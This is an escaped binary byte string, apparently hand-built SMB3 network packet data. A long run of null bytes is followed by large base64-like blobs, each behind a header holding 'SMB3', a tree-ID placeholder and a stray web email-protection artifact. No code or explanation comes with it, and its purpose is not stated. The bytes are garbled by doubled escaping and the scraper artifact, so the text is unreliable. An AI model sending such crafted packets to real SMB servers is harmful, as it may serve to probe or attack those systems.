0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x83\\\\xf3h6agLCqPqVyXi2VSQ8O6Yb9ijBX54jY6KM+sz33NmS6TK8XlOk920s0E0aajOV++wrR92ds1FOLBO+evLPj4sIvAjLvaLdgk8+BlNZs8PMa9bQ340J83nx1p4f+GLpbxUyzsAzkE9gB3hBYp3+0hNXMjbyjXwB40Q4KiDbip/d7N0CmRT1gLy+n2Rp/EYO5Fkapa4Y4kqDhPvLuOfGUvjN4BNdBk23r0/F3ZmfIe7zH9ecfDqJkkApLkf3Ls4CMvJ48cbGhUqHrML0az1LCeE3BqKLCL3gP10fExyMnFGtbq3rBd+5eKxSXYVD4fBKtFYI47YYbjYxxF76O9LNZEpPP9SiCEo9qRYLDcYzGu81JRU7/GHDKWSnvgjForSvyRO/e9ElIg1ISeyywaPJA1t1skDj8abBEOqAOXimo54/eZzGmLJ92xLwDIl8rHuZsUywgeZH/tSPXYQi0Pswy57TYZ/0/mXVIQjwi8EdJohFb3TKAzdHRMYopPusHBP7qyy18UVuiwGaf989u6seK2ER1R+aoJtvES8V0Zsx6slbdWrGxe4P62uwFxXStC/+qpCauvw/qpZvZo9wb458ezftwsbuOUYNlMWgBno/tWp5iSKfApu/I3RbVgaE3OmiLNYN3jw0gC5cT5tZZvDw9cBmHGcaVuvs+JAbsWoEsUaZd3R3Mn/1c1xYAumA/0VVaASNuohaU+8CmGSpny9/6ngCdejX4X//UMPKFxhlfaDnGbhbgr58SbJnYZ8KVeABMJeRJeLSP1f2AtrbAR8jSk5UgNllJcWnf+EM/Gyzh5DH0RqsyNfEbXNTxRzla1zNfWz0bB4fqzrdNNfNXvtTv9FWqyXCEHLhOz9p7JXzJBBUd0OR9rg8DFXIyNXMHCfeX5v/e2cDPWn7sSP1HU8sivMdWSP79eiYWZ6DOYjDkYmaBrFWuOKpwLyotORDEi1GMahE7btGFTN2IMgml2b9wZvqSuc7aAciGNkl7+NgmkG9r323QqSJrjCgp+DJ9URAkHRp/ovZWeh65j6G5mVS3o3Ux5cH2pfT/VZm8xsBsr1o2YKlVmsY6mPAOnlmaEwFLrPTm5WIYnd0yOc3abTlt6R1RfwenXgqn5K1K6Uq5o7T+KblzWV1TXo0zTIBD/CwnKbkITPd7GkK+fG/pVTIAGxuI84OwkE6U9/WO3niv3bgLtebI/5Oj2ESIrNTwBRdIGzDYcK1VTlSYl0RMsMMZvWqZAhNBs9xfpyBgzAn+5NpIUwKnm6HS2UbNab6SQIQF53r0+Rx8w7xZkOEayDuGvPQ32Y7zfHtM8o8wsNxWPtI1zCcMUyHPA3zAeGkKIy51j911mdZeLmlXULTazhCdl+lYNd6aoUthPLUew6ng+vSLSxqF1N7+/bFkcWd5vuCPigEKxEg+X3d+JviOJaI9GJ2HWIT8ehFzv6JP7ymkH0XaHYKIXXDbGpMhJWmZzOd+KeEt4MY6Be95bnyjLPxR8Htcc2E35+8q074yiBdThfaOMI18K65supem5lEgTe2lQdQurhhNhgbmYPpmWsSerB8R4CiDHQg6B1xxN9lpUnCWCn37Ib9vdQ2V90almoOSh5FfBxJiPIERqxvWkHqv3h/c0c8MZ3kLJi/+5PD+F/rT0hmgD1lUoqZ9KfEAB/ivMQzIbMnhoJ6DpDZwXvWgYON+Ti4Of8cD3JVZFHKCPtFO1LWNuXu9DHS0cChPvbPTNgL1fuz3hWniAOjJxyXhilxEmUKoCuaHrjL7/mCwA8mUTF8nZfDOYFw/CN4ol8UuKSKKNotx6s4EGyOXAGxRTqQw5Rqr70SWFUVy18EO3TCMj/3eC7HjDV7CAh6+160YbDs53m7AehAx+OlUNq01wPuaxFfSqlgcUG+9Rn1b/Xp1jvWeSkCNdYiiiXi1XwsMrdhKZGKroSXSSJclExe6ZgcNNPa/HgjvXbwtmRkgiGneql4mBYmKDzcXCkp/tjnL6/KriY81gMHN4G9ulMunxVyF8wybDcifTOxtarjLXVRuC1Y7vzYaEuHT\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x13\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0#\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd03\\\\x00\\\\x00\\\\x00\\\\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